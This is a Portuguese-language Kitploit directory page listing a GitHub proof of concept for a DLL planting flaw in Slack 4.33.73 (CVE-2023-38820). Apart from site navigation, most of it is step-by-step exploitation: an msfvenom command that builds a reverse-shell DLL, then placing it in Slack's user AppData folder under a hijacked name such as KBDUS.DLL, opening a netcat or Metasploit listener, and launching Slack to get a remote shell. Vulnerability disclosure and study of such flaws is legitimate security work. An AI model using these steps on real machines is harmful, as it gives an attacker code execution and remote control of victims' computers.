Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
DLL-Planting-Slack-4.33.73-CVE-2023-38820 — DLL Planting no Slack 4.33.73 - CVE-2023-38820 | Kitploit
Ferramentas/GitHubGitHub/trailer2/dll-planting-slack-4.33.73-cve-2023-38820
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoMovimento LateralPós-ExploraçãoDesenvolvimento de PayloadsExploração de Binários
GitHubtrailer2/dll-planting-slack-4.33.73-cve-2023-38820

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

DLL-Planting-Slack-4.33.73-CVE-2023-38820

DLL Planting no Slack 4.33.73 - CVE-2023-38820

Ver Repositório
4há 3 anosAinda não revisado

DLL-Planting-Slack-4.33.73-CVE-2023-38820

DLL Planting no Slack 4.33.73 - CVE-2023-38820 Descoberto por: Idan Malihi

Descrição

Um problema no Slack v.4.33.73 permite que um atacante local execute código arbitrário através do mecanismo de carregamento de DLL nos arquivos profapi.dll, CRYPTBASE.dll, KBDUS.DLL, DPAPI.dll, MSASN1.dll, mf.dll, mfplat.dll e RTWorkQ.DLL.

Passos para Reproduzir

Para explorar a vulnerabilidade, um atacante deve baixar e instalar o programa Slack e seguir os passos:

  1. Crie um arquivo dll malicioso com o msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o profapi.dll
  2. Transfira o arquivo dll malicioso para o computador da vítima
  3. Abra o caminho do Slack: "C:\Users\idan.m\AppData\Local\slack\app-4.33.73"
  4. Transfira a dll maliciosa para o caminho do Slack e nomeie-a como "KBDUS.DLL" para o exemplo.
  5. Abra um listener netcat ou metasploit
  6. Abra o Slack.exe
  7. Obtenha uma reverse shell.
Baixar ferramenta